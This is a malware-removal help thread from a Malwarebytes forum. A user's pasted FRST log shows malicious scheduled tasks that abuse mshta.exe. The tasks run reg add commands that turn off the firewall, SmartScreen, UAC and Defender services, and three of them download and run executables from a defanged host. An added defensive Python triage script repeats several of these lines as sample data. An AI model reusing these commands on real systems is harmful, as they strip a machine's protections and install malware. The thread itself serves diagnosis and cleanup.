Hourly mshta.exe trying to make outbound connections reports from Malwarebytes



This topic is a duplicate of https://forums.malwarebytes.com/topic/273271-getting-hourly-reports-of-malwarebytes-blocking-mshta-malware/

I have followed the steps, but I need help analyzing my FRST.txt report.

Important notes:

- Pirated software has been installed in the system
- Malwarebytes and AVAST scans failed to detect the root issue.
- I'm still on my free trial

FRST.txt


  • Root Admin

Hello and welcome, @luizh10

My screen name is AdvancedSetup and I will assist you with your system issues.

Let's keep these principles as we proceed. Make sure to read the entire post below first.

  • Removing pesky malware can be an involved set of tasks over separate runs. Have much patience. Follow my directions. 
  • Please follow all steps in the provided order and post back all requested logs.
  • Please attach all log files to your post, unless otherwise requested.
  • Temporarily disable Microsoft SmartScreen to download software below if needed. Make sure to turn it back on once the scans are completed.
  • Searching, detecting, and removing malware isn't instantaneous and there is no guarantee to repair every system.
  • Before we start, please make sure that you have an external backup of all private data.
  • Do not run online games while your case is ongoing. Do not do any free-wheeling, risky web-surfing.
  • Only run the tools I guide you to use. Please don't run any other scans, download, install or uninstall any programs while I'm working with you unless requested.
  • Cracked, Hacked, or Pirated programs are not only illegal but also can make a computer a malware victim.
    Having such programs installed is the easiest way to get infected. It is the leading cause of ransomware encryption. It is at times also a big source of current Trojan infections. 
    If there are any on the system you should uninstall them before we proceed.  
  • If your system is running Discord, or P2P Torrent software, please be sure to Exit out of it while this case is on-going.


Do these two steps so that ALL Folders & Files are set to SHOW, plus also, Turn OFF Windows Fast start.

Show-Hidden-Folders-Files-Extensions
https://forums.malwarebytes.com/topic/299345-show-hidden-folders-files-extensions/

Disable-Fast-Startup
https://forums.malwarebytes.com/topic/299350-disable-fast-startup/

  • Next, please restart Windows

  • Please be patient and stick with me until I give you the "all clear" or otherwise indicate all is good


To begin, please do the following so that we may take a closer look at your installation for troubleshooting. This is a report only.

NOTE: The tools and the information obtained are safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system security.

  • Download the Malwarebytes Support Tool
  • In your Downloads folder, open the mb-support-x.x.x.xxx.exe file
  • In the User Account Control pop-up window, click Yes to continue the installation
  • Run the MBST Support Tool
  • In the left navigation pane of the Malwarebytes Support Tool, click Advanced
  • In the Advanced Options, click Gather Logs. A status diagram displays the tool is Getting logs from your machine
  • A zip file named mbst-grab-results.zip will be saved to the Public desktop, please upload that file on your next reply

Thank you


Also, yesterday, before your first response, a colleague instructed me to look into Task Scheduler. Obviously malicious tasks were executing every two hours under the DirectX directory. I deleted them, but their details can be found in the first attached FRST.txt file. Below is a quote from the FRST.txt showing the records I deleted (only the ones calling mshta.exe). Apologies for disobeying, but it was for a good cause.

"Only run the tools I guide you to use. Please don't run any other scans, download, install or uninstall any programs while I'm working with you unless requested."

Task: {493D0DB6-25CB-440D-8850-A246859C2A31} - System32\Tasks\Microsoft\Windows\DirectX\AccountProtection_MicrosoftAccount_Disconnected => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\NTUSER\SOFTWARE\Microsoft\Windows Security Health\State"" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {B02FE7C0-A5D4-41C8-9F51-B1E10CD297C9} - System32\Tasks\Microsoft\Windows\DirectX\Antimalware => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\EventLog\System\Microsoft-Antimalware-ShieldProvider /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO
Task: {093B7DC2-9DE7-4860-9F99-13EBE3FE2C8A} - System32\Tasks\Microsoft\Windows\DirectX\AppAndBrowser_StoreAppsSmartScreenOff => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\SOFTWARE\Microsoft\Windows Security Health\State"" /v AppAndBrowser_StoreAppsSmartScreenOff /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {6902CCBC-3D7B-410B-A9A2-593AC4409A81} - System32\Tasks\Microsoft\Windows\DirectX\EnabledV9 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter /v EnabledV9 /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {FA5B83C8-9B99-4968-A751-CA0E9655EE82} - System32\Tasks\Microsoft\Windows\DirectX\EnabledV92 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter /v EnabledV9 /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {5EE7D868-EBEF-4430-BEDA-199A3717F7F9} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {6EE38F2B-596F-47B1-B5FB-32575DE50D98} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall2 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {5CBD55BE-075B-49BB-9B1F-203844344FCA} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall3 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {C21966B9-B90C-436B-8662-07DA738B16FF} - System32\Tasks\Microsoft\Windows\DirectX\EnableSmartScreen => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v EnableSmartScreen /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {DEAA4D8D-E61A-4DD2-8DD5-0A9971903931} - System32\Tasks\Microsoft\Windows\DirectX\EnableWebContentEvaluation => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {040631E7-9A5A-4F65-AED6-050DEB07117F} - System32\Tasks\Microsoft\Windows\DirectX\EnableWebContentEvaluation2 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\NTUSER\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {537E4952-F771-4231-B90F-7904BDB94D95} - System32\Tasks\Microsoft\Windows\DirectX\MsSecFlt => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO
Task: {D0411F01-7D6E-4AF4-B68A-21C46E2DFC0F} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {7CB45D1C-906B-4D9C-9A11-77F9D7D47BA7} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride1 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\NTUSER\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {36D8316F-4171-43F5-B726-0F4A6C3F9757} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride2 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {82CCC4B4-AC50-438D-B9F5-3CEE07829963} - System32\Tasks\Microsoft\Windows\DirectX\PreventOverride3 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter /v PreventOverride /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {5FBBA474-D25D-4B8C-9201-FAA5BED72AE8} - System32\Tasks\Microsoft\Windows\DirectX\SecurityHealth2 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 030000000000000000000000 /f",0)(Window.Close) <==== ATENÇÃO
Task: {72F12AD6-203E-4605-99C0-A6FE1D5740C8} - System32\Tasks\Microsoft\Windows\DirectX\Sense => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO
Task: {B5D112BE-EC89-4F96-8DD0-B28E4BDFB344} - System32\Tasks\Microsoft\Windows\DirectX\Services CHosted => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c %windir%\system32\curl.exe hxxp://l96.org/c.exe -o %windir%\c.exe & %windir%\c.exe",0)(Window.Close) <==== ATENÇÃO
Task: {7CAD408B-357E-4A04-930A-598DA7C3105F} - System32\Tasks\Microsoft\Windows\DirectX\Services NHosted => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c %windir%\system32\curl.exe hxxp://l96.org/n.exe -o %windir%\n.exe & %windir%\n.exe",0)(Window.Close) <==== ATENÇÃO
Task: {C5812091-153A-4FDE-B7EE-4DA164298413} - System32\Tasks\Microsoft\Windows\DirectX\Services RHosted => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c %windir%\system32\curl.exe hxxp://l96.org/r.exe -o %windir%\r.exe & %windir%\r.exe",0)(Window.Close) <==== ATENÇÃO
Task: {EB6C1338-65DE-4B0E-83DC-EF8302F2752B} - System32\Tasks\Microsoft\Windows\DirectX\UAC Content => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {86186330-3B4D-4CC0-ABAF-8863E6BD233A} - System32\Tasks\Microsoft\Windows\DirectX\UAC Popup => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {7802F7F9-6DBF-41C8-ACD6-373684954445} - System32\Tasks\Microsoft\Windows\DirectX\WinDefend3 => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\EventLog\System\WinDefend /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO

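The FRST excerpt above is a compact record of a defence-evasion chain: every task launches mshta.exe with an inline vbscript: payload that either runs reg add against a firewall, SmartScreen, UAC or service Start value, or pulls an executable with curl. The script below is an added example (not part of FRST, Malwarebytes or this thread) that triages such Task: lines for a defender: it parses the line format inferred from the excerpt, pulls out the registry change and any (defanged) URL, and tags each task by what it does. The sample input copies five lines from the post above plus one constructed benign task; the mapping from registry value names to the protection they switch off is an editorial assumption based on well-known Windows policy keys.

```python
"""Triage FRST 'Task:' lines for scheduled tasks that abuse mshta.exe (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: five lines copied from the FRST excerpt in the thread plus one
# made-up benign task (GUID, vendor and path are placeholders) for the filter to skip.
SAMPLE_FRST = r'''
Task: {5EE7D868-EBEF-4430-BEDA-199A3717F7F9} - System32\Tasks\Microsoft\Windows\DirectX\EnableFirewall => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile /v EnableFirewall /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {EB6C1338-65DE-4B0E-83DC-EF8302F2752B} - System32\Tasks\Microsoft\Windows\DirectX\UAC Content => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {B5D112BE-EC89-4F96-8DD0-B28E4BDFB344} - System32\Tasks\Microsoft\Windows\DirectX\Services CHosted => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c %windir%\system32\curl.exe hxxp://l96.org/c.exe -o %windir%\c.exe & %windir%\c.exe",0)(Window.Close) <==== ATENÇÃO
Task: {72F12AD6-203E-4605-99C0-A6FE1D5740C8} - System32\Tasks\Microsoft\Windows\DirectX\Sense => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f",0)(Window.Close) <==== ATENÇÃO
Task: {493D0DB6-25CB-440D-8850-A246859C2A31} - System32\Tasks\Microsoft\Windows\DirectX\AccountProtection_MicrosoftAccount_Disconnected => C:\Windows\system32\mshta.exe [43520 2023-10-11] (Microsoft Windows -> Microsoft Corporation) -> vbscript:CreateObject("WScript.Shell").Run("cmd /c reg add ""HKLM\NTUSER\SOFTWARE\Microsoft\Windows Security Health\State"" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f",0)(Window.Close) <==== ATENÇÃO
Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\ExampleVendor\Updater => C:\Program Files\ExampleVendor\updater.exe [123456 2023-05-01] (ExampleVendor -> ExampleVendor Inc.) -> /silent
'''

# Line format inferred from the excerpt: GUID, task path, executable, [size date], (signer),
# optional "-> payload", optional FRST attention marker (Portuguese build prints ATENÇÃO).
TASK_RE = re.compile(
    r"^Task: \{(?P<guid>[0-9A-Fa-f-]+)\} - (?P<path>.+?) => (?P<exe>.+?) "
    r"\[(?P<size>\d+) (?P<date>\d{4}-\d{2}-\d{2})\] \((?P<signer>[^()]*)\)"
    r"(?: -> (?P<payload>.*?))?(?: <==== .*)?$"
)
# 'reg add' as embedded in the VBScript string; keys may be wrapped in doubled quotes ("").
REG_ADD_RE = re.compile(
    r'reg add (?:"+(?P<qkey>[^"]+)"+|(?P<key>\S+)) /v (?P<value>\S+) /t (?P<type>\S+) /d (?P<data>\S+)',
    re.IGNORECASE,
)
# Matches defanged (hxxp) and live URLs; the match is reported verbatim, never re-fanged.
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://[^\s\"'&]+")

LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# Assumed mapping: registry value names whose data 0 switches a protection off.
SECURITY_VALUES = {
    "enablefirewall": "Windows Firewall profile (policy)",
    "enablesmartscreen": "Windows SmartScreen (policy)",
    "enabledv9": "SmartScreen phishing filter (IE/Edge policy)",
    "preventoverride": "SmartScreen override prevention",
    "enablewebcontentevaluation": "SmartScreen for Store apps",
    "consentpromptbehavioradmin": "UAC consent prompt for administrators",
    "promptonsecuredesktop": "UAC secure desktop",
}


@dataclass
class RegChange:
    key: str
    value: str
    type: str
    data: str


@dataclass
class Finding:
    guid: str
    name: str
    exe: str
    tags: list = field(default_factory=list)
    reg_changes: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    notes: list = field(default_factory=list)


def parse_task_line(line):
    """Return the parsed fields of one FRST Task: line, or None if it is not one."""
    m = TASK_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze_task(task):
    """Tag one parsed task; return a Finding only when something is worth a look."""
    exe_name = task["exe"].rsplit("\\", 1)[-1].lower()
    payload = task["payload"] or ""
    f = Finding(task["guid"], task["path"].rsplit("\\", 1)[-1], task["exe"])
    if exe_name in LOLBINS:
        f.tags.append("lolbin:" + exe_name)
    if payload.lower().startswith(("vbscript:", "javascript:")):
        f.tags.append("inline-script")
    for m in REG_ADD_RE.finditer(payload):
        rc = RegChange(m.group("qkey") or m.group("key"), m.group("value"), m.group("type"), m.group("data"))
        f.reg_changes.append(rc)
        v = rc.value.lower()
        if v == "start" and "\\services\\" in rc.key.lower() and rc.data == "4":
            svc = rc.key.rsplit("\\", 1)[-1]
            f.tags.append("service-disable")
            f.notes.append(f"{svc}: Start=4 (SERVICE_DISABLED)")
        elif v in SECURITY_VALUES and rc.data == "0":
            f.tags.append("defense-evasion:registry")
            f.notes.append(f"{SECURITY_VALUES[v]} turned off via {rc.value}=0")
    f.urls = URL_RE.findall(payload)
    if f.urls:
        f.tags.append("remote-download")
    f.tags = list(dict.fromkeys(f.tags))  # de-duplicate, keep order
    return f if f.tags else None


def triage_frst_tasks(text):
    """Parse every Task: line in an FRST report and return the suspicious ones in order."""
    findings = []
    for line in text.splitlines():
        task = parse_task_line(line)
        if task and (f := analyze_task(task)):
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage_frst_tasks(SAMPLE_FRST):
        print(f"{f.name:<50} {', '.join(f.tags)}")
        for note in f.notes + [f"downloads {u}" for u in f.urls]:
            print(f"    {note}")
```

Run against a real FRST.txt by reading the file and passing its text to triage_frst_tasks; the benign constructed task produces no finding, while each of the five copied lines is tagged lolbin:mshta.exe and inline-script plus the specific action (firewall or UAC policy set to 0, Services\Sense Start=4, or a remote download). Reporting the URL defanged exactly as FRST prints it keeps the output safe to paste into a ticket.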

  • Root Admin

You have Avast AV installed. Please check for updates and then do a Full System scan with it and post back the results


You also have this running in Google Chrome. Not sure how long you've had it, but maybe this is related?

CHR NewTab: Profile 1 ->  Active:"chrome-extension://laookkfknpbbblfpciffpaejjkokdgca/dashboard.html"


It's triggering an exploit protection block that is using cmd.exe to run as well


Probably had this malware extension for more than a year, since that's when I switched to the Opera GX browser. Now I rarely open Chrome. I'll look into how to completely remove extensions. I'll come back in a few hours with the updated Avast full system scan; however, I don't like Avast that much, which is why I downloaded Malwarebytes.

On the subject of Potentially Unwanted Programs I should remove from my system... what is your opinion on Hola VPN?

Also, thank you so much for your help so far.


  • Root Admin

I'm not a fan of Hola and neither is the Farbar scanner. It flags it too but I ignored it as I don't think it's a threat.

We have our own VPN - Malwarebytes Privacy VPN (making it clear that obviously there may be a bias there)

I have used the following with good results. Listed in order of personal preference, as they have independent audits of the service.

I've used many others over the years, but they're not really worth mentioning.

Mullvad VPN - https://mullvad.net/en

ExpressVPN - https://www.expressvpn.com/


I am not a fan of the Opera browser. It used to be an excellent alternative browser, but today they simply do not care about your privacy and try to show and connect everything to everything. To me that is a recipe for too much exposure in today's world where hackers are trying to gather enough data on you to carry out a successful attack on you.

My preference is Firefox, or even Brave over Google Chrome, MS Edge, or Opera


If you don't want Avast, then do the scan. Then post the results and go ahead and uninstall Avast. Then restart the computer and get me a new set of logs from the Farbar scanner.


FRST.TXT
ADDITION.TXT


Thanks


Avast scan complete. Found 2 unrecognized entries; the rest are an assortment of false positives: used keygens for music software, crypto mining software, etc. I don't use them anymore, so they can go too.

Can't tell why my FRST scan is in Portuguese, but I don't think it really matters. I gave the scans a brief look and can't find anything worth mentioning. Let me know if you find anything; if not, I think we can mark this as solved.

image.png

FRST.txt Addition.txt


  • Root Admin

Hello @luizh10

The Farbar scan is mostly in Portuguese due to that being the version of Windows installed.

You have Farbar here:  C:\Users\luiz\Downloads\FRST64.exe  

If you use this other one on your system, it will attempt to convert most of it to English:

C:\Users\luiz\Downloads\FRSTEnglish.exe 

Some of it may still not be in English but more should be.


If you still want to remove Avast, please go ahead and uninstall it and restart the computer.

Then run the Farbar (FRST) program located here, with Admin rights and click the SCAN button.    C:\Users\luiz\Downloads\FRSTEnglish.exe  

Post back as an attachment both of these new files

FRST.TXT
ADDITION.TXT


Thanks


  • 3 weeks later...
  • Root Admin

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Tips to help protect from infection

Thanks
